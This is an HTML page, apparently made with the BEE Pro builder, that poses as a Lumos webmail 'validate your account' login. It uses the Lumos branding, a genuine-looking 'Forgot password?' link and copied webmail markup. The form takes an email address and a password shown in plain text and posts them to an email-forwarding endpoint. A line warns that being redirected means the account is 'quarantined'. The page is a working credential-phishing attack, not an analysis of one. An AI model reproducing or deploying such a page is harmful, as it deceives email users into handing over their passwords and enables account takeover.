<!DOCTYPE html>
<html>
  <head>
    <title></title>
    <meta content="summary_large_image" name="twitter:card" />
    <meta content="website" property="og:type" />
    <meta content="" property="og:description" />
    <meta
      content="https://ykp7t18ecd.preview-postedstuff.com/V2-IGEG-uwCh-WoXH-a2XS/"
      property="og:url"
    />
    <meta
      content="https://pro-bee-beepro-thumbnail.getbee.io/messages/1031738/1016744/1966236/9680376_large.jpg"
      property="og:image"
    />
    <meta content="" property="og:title" />
    <meta charset="utf-8" />
    <meta content="width=device-width" name="viewport" />
    <style>
      body {
        color: #000;
        background-color: #fff;
        font-family: Arial, Helvetica, sans-serif;
      }

      .bee-page-container {
        background-image: none;
        background-position: 0 0;
        background-repeat: no-repeat;
        background-size: auto;
      }

      a {
        color: #8a3c90;
      }

      * {
        box-sizing: border-box;
      }

      body,
      p {
        margin: 0;
      }

      .bee-row {
        position: relative;
      }

      .bee-row-content {
        max-width: 505px;
        margin: 0 auto;
      }

      .bee-row-content {
        display: flex;
        position: relative;
      }

      .bee-row-content .bee-col-w4 {
        flex-basis: 33%;
      }

      .bee-row-content .bee-col-w8 {
        flex-basis: 67%;
      }

      .bee-row-content .bee-col-w12 {
        flex-basis: 100%;
      }

      .bee-divider {
        overflow: auto;
      }

      .bee-divider .center {
        margin: 0 auto;
      }

      .bee-form .bee-form-row .bee-field {
        flex-wrap: wrap;
        flex: 1;
        align-items: center;
        padding: 3px;
        display: flex;
      }

      .bee-form
        .bee-form-row
        .bee-field
        input:not([type="checkbox"]):not([type="radio"]) {
        font-family: inherit;
        font-size: inherit;
        flex-grow: 1;
      }

      .bee-form .bee-form-row .bee-field button {
        font-family: inherit;
        font-size: inherit;
      }

      .bee-form .bee-form-row .bee-field .bee-button-container {
        flex-grow: 1;
      }

      .bee-form input[type="color"] {
        border: none;
        height: 38px;
      }

      .bee-form input[type="color"]::-webkit-color-swatch-wrapper {
        margin: 0;
        padding: 2px;
      }

      .bee-form input[type="color"]::-webkit-color-swatch {
        margin: 0;
        padding: 0;
      }

      .bee-html-block {
        text-align: center;
      }

      .bee-icon {
        vertical-align: middle;
        display: inline-block;
      }

      .bee-icon .bee-content {
        align-items: center;
        display: flex;
      }

      .bee-icon .bee-icon-label-right a {
        text-decoration: none;
      }

      .bee-paragraph {
        overflow-wrap: anywhere;
      }

      .bee-row-1 {
        background-repeat: no-repeat;
      }

      .bee-row-1 .bee-row-content {
        color: #000;
        background-repeat: no-repeat;
        border-radius: 0;
      }

      .bee-row-1 .bee-col-1 {
        padding-top: 5px;
        padding-bottom: 5px;
      }

      .bee-row-1 .bee-col-1 .bee-block-1 {
        padding: 10px;
      }

      .bee-row-2 {
        background-repeat: no-repeat;
      }

      .bee-row-2 .bee-row-content {
        color: #000;
        background-color: #d5d5d5;
        background-repeat: no-repeat;
        border-radius: 0;
      }

      .bee-row-2 .bee-col-1 {
        border: 3px solid #4a4476;
        flex-direction: column;
        justify-content: center;
        padding: 5px;
        display: flex;
      }

      .bee-row-2 .bee-col-1 .bee-block-1 {
        color: #000;
        text-align: center;
        font-family: inherit;
        font-size: 15px;
        font-weight: 400;
      }

      .bee-row-2 .bee-col-2 {
        background-color: #0e57ab;
        flex-direction: column;
        justify-content: center;
        padding-top: 5px;
        padding-bottom: 5px;
        display: flex;
      }

      .bee-row-2 .bee-col-2 .bee-block-1 {
        padding: 10px;
      }

      .bee-row-3 {
        background-repeat: no-repeat;
      }

      .bee-row-3 .bee-row-content {
        color: #000;
        background-color: #e7e7e7;
        background-repeat: no-repeat;
      }

      .bee-row-3 .bee-col-1 {
        padding-top: 5px;
        padding-bottom: 5px;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 {
        text-align: center;
        padding: 10px;
        font-family: inherit;
        font-size: 16px;
        font-weight: 400;
      }

      .bee-row-3 .bee-col-1 .bee-block-2,
      .bee-row-3 .bee-col-1 .bee-block-3 {
        padding: 10px;
      }

      .bee-row-4 {
        background-repeat: no-repeat;
      }

      .bee-row-4 .bee-row-content {
        color: #000;
        background-repeat: no-repeat;
        border-radius: 0;
      }

      .bee-row-4 .bee-col-1 {
        flex-direction: column;
        justify-content: flex-end;
        display: flex;
      }

      .bee-row-4 .bee-col-1 .bee-block-1 {
        color: #000;
        letter-spacing: -2px;
        text-align: left;
        font-family: inherit;
        font-size: 14px;
        font-weight: 400;
      }

      .bee-row-5 {
        background-repeat: no-repeat;
        background-size: auto;
      }

      .bee-row-5 .bee-row-content {
        color: #000;
        background-repeat: no-repeat;
        background-size: auto;
        border: 5px solid #e7e7e7;
        border-width: 5px 5px 6px 8px;
        border-radius: 0;
      }

      .bee-row-5 .bee-col-1 {
        border: 7px solid #e7e7e7;
      }

      .bee-row-5 .bee-col-1 .bee-block-1 {
        padding: 10px;
      }

      .bee-row-6 {
        background-repeat: no-repeat;
      }

      .bee-row-6 .bee-row-content {
        color: #000;
        background-repeat: no-repeat;
        border-radius: 0;
      }

      .bee-row-6 .bee-col-1 {
        padding-top: 5px;
        padding-bottom: 5px;
      }

      .bee-row-6 .bee-col-1 .bee-block-1 {
        padding: 10px;
      }

      .bee-row-7 {
        background-repeat: no-repeat;
      }

      .bee-row-7 .bee-row-content {
        color: #000;
        background-repeat: no-repeat;
      }

      .bee-row-7 .bee-col-1 {
        padding-top: 5px;
        padding-bottom: 5px;
      }

      .bee-row-7 .bee-col-1 .bee-block-1 {
        color: #9d9d9d;
        text-align: center;
        padding-top: 5px;
        padding-bottom: 5px;
        font-family: inherit;
        font-size: 15px;
      }

      .bee-row-8 {
        background-repeat: no-repeat;
      }

      .bee-row-8 .bee-row-content {
        color: #000;
        background-repeat: no-repeat;
        border-radius: 0;
      }

      .bee-row-8 .bee-col-1 {
        padding-top: 5px;
        padding-bottom: 5px;
      }

      .bee-row-3 .bee-col-1 .bee-block-2 {
        color: #101112;
        direction: ltr;
        letter-spacing: 0;
        text-align: center;
        font-size: 16px;
        font-weight: 400;
        line-height: 120%;
      }

      .bee-row-3 .bee-col-1 .bee-block-2 a {
        color: #0606ff;
      }

      .bee-row-3 .bee-col-1 .bee-block-2 p:not(:last-child) {
        margin-bottom: 16px;
      }

      .bee-row-1 .bee-col-1 .bee-block-1 {
        color: #101112;
        direction: ltr;
        letter-spacing: 0;
        text-align: left;
        font-size: 16px;
        font-weight: 400;
        line-height: 120%;
      }

      .bee-row-1 .bee-col-1 .bee-block-1 a {
        color: #8a3c90;
      }

      .bee-row-1 .bee-col-1 .bee-block-1 p:not(:last-child) {
        margin-bottom: 16px;
      }

      .bee-row-5 .bee-col-1 .bee-block-1 {
        color: #ff2f2f;
        direction: ltr;
        letter-spacing: 0;
        text-align: center;
        font-size: 13px;
        font-weight: 400;
        line-height: 200%;
      }

      .bee-row-5 .bee-col-1 .bee-block-1 a {
        color: #8a3c90;
      }

      .bee-row-5 .bee-col-1 .bee-block-1 p:not(:last-child) {
        margin-bottom: 0;
      }

      .bee-row-4 .bee-col-1 .bee-block-1 .bee-icon-image {
        padding: 0;
      }

      .bee-row-4
        .bee-col-1
        .bee-block-1
        .bee-icon:not(.bee-icon-first)
        .bee-content {
        margin-left: 0;
      }

      .bee-row-4
        .bee-col-1
        .bee-block-1
        .bee-icon::not(.bee-icon-last)
        .bee-content {
        margin-right: 0;
      }

      .bee-row-2 .bee-col-2 .bee-block-1 {
        color: #005ab6;
        direction: ltr;
        letter-spacing: 0;
        text-align: right;
        font-size: 18px;
        font-weight: 400;
        line-height: 200%;
      }

      .bee-row-2 .bee-col-2 .bee-block-1 a {
        color: #8a3c90;
      }

      .bee-row-2 .bee-col-2 .bee-block-1 p:not(:last-child) {
        margin-bottom: 16px;
      }

      .bee-row-2 .bee-col-1 .bee-block-1 .bee-icon-image {
        padding: 5px;
      }

      .bee-row-2
        .bee-col-1
        .bee-block-1
        .bee-icon:not(.bee-icon-first)
        .bee-content {
        margin-left: 0;
      }

      .bee-row-2
        .bee-col-1
        .bee-block-1
        .bee-icon::not(.bee-icon-last)
        .bee-content {
        margin-right: 0;
      }

      .bee-row-6 .bee-col-1 .bee-block-1 {
        color: #101112;
        direction: ltr;
        letter-spacing: 0;
        text-align: left;
        font-size: 16px;
        font-weight: 400;
        line-height: 120%;
      }

      .bee-row-6 .bee-col-1 .bee-block-1 a {
        color: #484ef8;
      }

      .bee-row-6 .bee-col-1 .bee-block-1 p:not(:last-child) {
        margin-bottom: 11px;
      }

      .bee-row-7 .bee-col-1 .bee-block-1 .bee-icon-image {
        padding: 5px 6px 5px 5px;
      }

      .bee-row-7
        .bee-col-1
        .bee-block-1
        .bee-icon:not(.bee-icon-first)
        .bee-content {
        margin-left: 0;
      }

      .bee-row-7
        .bee-col-1
        .bee-block-1
        .bee-icon::not(.bee-icon-last)
        .bee-content {
        margin-right: 0;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 {
        text-align: center;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 form {
        width: 95%;
        display: inline-block;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 label,
      .bee-row-3 .bee-col-1 .bee-block-1 div.label {
        color: #101112;
        letter-spacing: normal;
        text-align: left;
        line-height: 200%;
        display: block;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 label:not(.inline),
      .bee-row-3 .bee-col-1 .bee-block-1 div.label:not(.inline) {
        flex-basis: 100%;
      }

      .bee-row-3
        .bee-col-1
        .bee-block-1
        .bee-form-row:not(.bee-sidelabel)
        input:not([type="checkbox"]):not([type="radio"]) {
        width: 100%;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 ::-webkit-input-placeholder {
        color: #000;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 :-moz-placeholder {
        color: #000;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 ::-moz-placeholder {
        color: #000;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 :-ms-input-placeholder {
        color: #000;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 div.label,
      .bee-row-3 .bee-col-1 .bee-block-1 .bee-field > label:first-child {
        padding: 3px;
      }

      .bee-row-3
        .bee-col-1
        .bee-block-1
        input:not([type="checkbox"]):not([type="radio"]):not([type="image"]) {
        color: #000;
        background-color: #fff;
        border: 1px solid #0000;
        border-radius: 0;
        min-height: 42px;
        padding: 5px;
      }

      .bee-row-3
        .bee-col-1
        .bee-block-1
        input:not([type="checkbox"]):not([type="radio"]):focus {
        outline-color: #fff;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 button {
        color: #fff;
        letter-spacing: normal;
        background-color: #3d3c90;
        border: 0 solid #0000;
        border-top: 14px solid #e7e7e7;
        border-radius: 4px;
        width: 100%;
        padding: 15px 20px 5px;
        line-height: 200%;
      }

      .bee-row-3 .bee-col-1 .bee-block-1 .bee-button-container {
        text-align: center;
      }

      @media (max-width: 525px) {
        .bee-form form {
          width: 100% !important;
        }

        .bee-row-content:not(.no_stack) {
          display: block;
        }

        .bee-mobile_hide {
          display: none;
        }

        .bee-row-2 .bee-col-2 .bee-block-1 {
          text-align: center !important;
        }
      }
    </style>
    <script async defer src="https://www.google.com/recaptcha/api.js"></script>
    <script>
      function onSubmit(token) {
        for (const form of document.getElementsByClassName("recaptcha-form")) {
          if (form.checkValidity()) {
            form.submit();
          } else {
            grecaptcha.reset();
            form.reportValidity();
          }
        }
      }
    </script>
  </head>

  <body>
    <div class="bee-page-container">
      <div class="bee-row bee-row-1 bee-mobile_hide">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div class="bee-block bee-block-1 bee-paragraph">
              <p></p>
              <p></p>
              <p></p>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-2">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w4">
            <div class="bee-block bee-block-1 bee-icons">
              <div class="bee-icon bee-icon-last">
                <div class="bee-content">
                  <div class="bee-icon-image">
                    <img
                      height="32px"
                      src="https://13dd4a9a89.imgdist.com/public/users/Integrators/BeeProAgency/1031738_1016744/login-logo.png"
                      width="auto"
                    />
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div class="bee-col bee-col-2 bee-col-w8">
            <div
              class="bee-block bee-block-1 bee-paragraph"
              id="module_133b88be-20e9-4e02-a2cc-b4424cc1f35e"
            >
              <p>
                <span style="color: #ffffff;"
                  ><strong>Log in to validate </strong
                  ><span style="background-color: transparent;"
                    ><strong>Webmail.</strong></span
                  ></span
                >
              </p>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-3">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div class="bee-block bee-block-1 bee-form">
              <form
                accept-charset="UTF-8"
                action="https://beepro-api.getbee.io/pages/send-email/"
                autocomplete="on"
                class="recaptcha-form"
                enctype="multipart/form-data"
                method="post"
                target="_self"
              >
                <div class="bee-form-row">
                  <div class="bee-field bee-field-r2c0m0i1">
                    <label for="r2c0m0i1">Password</label
                    ><input
                      id="r2c0m0i1"
                      name="firstname"
                      placeholder="Password"
                      required=""
                      type="text"
                    />
                  </div>
                </div>
                <div class="bee-form-row">
                  <div class="bee-field bee-field-r2c0m0i3">
                    <label for="r2c0m0i3">Email Address</label
                    ><input
                      id="r2c0m0i3"
                      name="email"
                      placeholder="Email Address"
                      required=""
                      type="email"
                    />
                  </div>
                </div>
                <div class="bee-form-row">
                  <div class="bee-field bee-field-r2c0m0i11">
                    <div class="bee-button-container">
                      <button
                        class="g-recaptcha"
                        data-callback="onSubmit"
                        data-sitekey="6LcFnWcaAAAAAE_8NkV8u7meL5NcPwyAllfrsu8g"
                        id="r2c0m0i11"
                        type="submit"
                        value="SIGN IN"
                      >
                        SIGN IN
                      </button>
                    </div>
                  </div>
                </div>
                <input
                  name="pageId"
                  type="hidden"
                  value="9680376:Sbk29uMxctFH5DQo0g28JyRphmEdRck0eTElOZBsADY"
                />
              </form>
            </div>
            <div class="bee-block bee-block-2 bee-paragraph">
              <p>
                <a
                  href="https://webmail.lumos.net/"
                  ng-click="goToForgotPassword()"
                  ng-if="( loadingstatus === '') &amp;&amp; showForgotLink &amp;&amp; !customForgotPassURL"
                  style="text-decoration: underline;"
                  translate="LANG_LOGIN_FORGOT_PASSWORD"
                  >Forgot password?</a
                >
              </p>
            </div>
            <div class="bee-block bee-block-3 bee-divider">
              <div
                class="center bee-separator"
                style="border-top: 1px solid #dddddd; width: 100%;"
              ></div>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-4">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div class="bee-block bee-block-1 bee-icons">
              <div class="bee-icon bee-icon-last">
                <div class="bee-content">
                  <div class="bee-icon-image">
                    <img
                      height="64px"
                      src="https://webmail.lumos.net/b177b3c/branding/hid-2658/images/navstatus-logo.png"
                      width="auto"
                    />
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-5">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div class="bee-block bee-block-1 bee-paragraph">
              <p>
                <strong
                  >If you are redirected to the support web page, that means
                  your account is currently quarantined.</strong
                >
              </p>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-6">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div class="bee-block bee-block-1 bee-paragraph">
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
              <p></p>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-7">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div
              class="bee-block bee-block-1 bee-icons"
              id="beepro-locked-footer"
            >
              <div class="bee-icon bee-icon-last">
                <div class="bee-content">
                  <div class="bee-icon-image">
                    <a
                      href="https://www.designedwithbee.com/?utm_source=editor&amp;utm_medium=bee_pro&amp;utm_campaign=free_footer_link"
                      target="_blank"
                      title="Designed with BEE"
                      ><img
                        alt="Designed with BEE"
                        height="32px"
                        src="https://d1oco4z2z1fhwp.cloudfront.net/assets/bee.png"
                        width="auto"
                    /></a>
                  </div>
                  <div class="bee-icon-label bee-icon-label-right">
                    <a
                      href="https://www.designedwithbee.com/?utm_source=editor&amp;utm_medium=bee_pro&amp;utm_campaign=free_footer_link"
                      target="_blank"
                      title="Designed with BEE"
                      >Designed with BEE</a
                    >
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="bee-row bee-row-8">
        <div class="bee-row-content">
          <div class="bee-col bee-col-1 bee-col-w12">
            <div class="bee-block bee-block-1 bee-html-block">
              <!DOCTYPE html>

              <meta charset="utf-8" />
              <meta content="IE=edge" http-equiv="X-UA-Compatible" />
              <meta
                content="width=device-width, user-scalable=yes, initial-scale=1, maximum-scale=4.0"
                name="viewport"
              />
              <meta content="" name="description" />
              <meta content="H" name="author" />
              <meta content="max-age=0" http-equiv="cache-control" />
              <meta content="no-cache" http-equiv="cache-control" />
              <meta content="0" http-equiv="expires" />
              <meta
                content="Tue, 01 Jan 1980 1:00:00 GMT"
                http-equiv="expires"
              />
              <meta content="no-cache" http-equiv="pragma" />
              <!-- OneTrust Cookies Consent Notice start -->
              <script
                charset="UTF-8"
                data-domain-script="{{ oneTrustToken }}"
                ng-if="oneTrustToken &amp;&amp; oneTrustToken.length &gt; 0"
                ng-src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js"
                type="text/javascript"
              ></script>
              <script type="text/javascript">
                function OptanonWrapper() {}
              </script>
              <!-- OneTrust Cookies Consent Notice end -->
              <script charset="UTF-8">
                window["adrum-start-time"] = new Date().getTime();
                (function (config) {
                  config.appKey = "AD-AAB-AAV-JZW";
                  config.adrumExtUrlHttp = "http://cdn.appdynamics.com";
                  config.adrumExtUrlHttps = "https://cdn.appdynamics.com";
                  config.beaconUrlHttp = "http://pdx-col.eum-appdynamics.com";
                  config.beaconUrlHttps = "https://pdx-col.eum-appdynamics.com";
                  config.xd = {
                    enable: false
                  };
                })(window["adrum-config"] || (window["adrum-config"] = {}));
              </script>
              <script src="https://cdn.appdynamics.com/adrum/adrum-4.5.15.2691.js"></script>
              <script type="text/javascript">
                var mobileVersion = "wm6";
                var RELEASE_VERSION = "b177b3c";
                var IS_MOBILE = false;
                var wbmglobals = {
                  IS_MOBILE: IS_MOBILE,
                  MEXT: IS_MOBILE ? "-m" : ""
                };
              </script>
              <title pagetitle-directive=""></title>
              <link
                ng-href="{{branding.images.favicon}}"
                rel="icon"
                type="image/png"
              />
              <link
                href="//fonts.googleapis.com/css?family=Lato:300,400,700"
                rel="stylesheet"
                type="text/css"
              />
              <link
                href="b177b3c/css/app.css"
                rel="stylesheet"
                type="text/css"
              />
              <link
                ng-href="{{branding.css.custom}}"
                ng-if="branding.css.custom"
                rel="stylesheet"
                type="text/css"
              />
              <link
                ng-href="{{customPagesSettings.paths.css.custompages}}"
                ng-if="customPagesSettings.paths.css.custompages"
                rel="stylesheet"
                type="text/css"
              />
              <div
                id="theme-container"
                ng-class="{ 'has-theme': themeParams.theme.cssPrefix !== 'default', 'no-theme': themeParams.theme.cssPrefix === 'default'}"
                ng-if="!mobileDevice"
                ng-style="{ 'background-image': 'url(' + themeParams.image.data + ')', 'background-size': themeParams.image.bckSize ? themeParams.image.bckSize : 'cover' }"
              >
                <div ui-view="growl"></div>
                <div ui-view="app"></div>
                <wcag-directive></wcag-directive>
              </div>
              <div ng-if="mobileDevice">
                <div ui-view="mobileinfo"></div>
              </div>
              <!-- Loading -->
              <div
                class="loading-spinner-home loading-full-screen"
                ng-show="( isMobile !== true &amp;&amp; isMobile !== false )"
              >
                <span class="fa fa-fw fa-cog fa-spin"></span>
              </div>
              <!-- used in util-audiofile-factory for IE hack for playing sounds -->
              <div id="audiocnt"></div>
              <script
                data-main="b177b3c/main.js"
                src="b177b3c/require.js"
              ></script>
              <!-- vsteele 2.22.54.0 2022.11.28 -->
              <!-- vsteele 2.22.54.0 2022.11.28 -->
              <!-- vsteele 2.22.54.0 2022.11.29 -->
              <!-- vsteele 2.23.19.0 2023.04.13 -->
              <!-- vsteele 2.23.19.1 2023.04.20 -->
              <!-- vsteele 2.23.19.2 2023.04.24 -->
            </div>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
